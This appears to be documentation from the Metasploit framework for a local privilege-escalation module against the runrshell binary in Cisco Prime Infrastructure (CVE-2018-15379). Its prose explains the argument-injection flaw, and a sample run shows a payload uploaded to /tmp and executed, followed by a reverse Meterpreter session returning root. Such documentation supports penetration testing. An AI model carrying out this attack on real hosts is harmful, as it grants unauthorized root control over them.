metasploit-gs/documentation/modules/exploit/linux/local/cpi_runrshell_priv_esc.md

Vulnerable Application

This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The runrshell binary is meant to execute a shell script as root, but can be abused to inject extra commands in the argument, allowing you to execute anything as root. It was originally discovered by Pedro Ribeiro, and chained in the CVE-2018-15379 exploit.

Scenarios

msf5 exploit(linux/local/cpi_runrshell_priv_esc) > run

[*] Started reverse TCP handler on 192.168.0.21:4444 
[*] Uploading /tmp/mYVrqmsETa.bin
[*] chmod the file with +x
[*] Executing /tmp/mYVrqmsETa.bin
[*] Sending stage (985320 bytes) to 192.168.0.23
[*] Meterpreter session 4 opened (192.168.0.21:4444 -> 192.168.0.23:55554) at 2019-06-10 11:18:13 -0500
[+] Deleted /tmp/mYVrqmsETa.bin

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >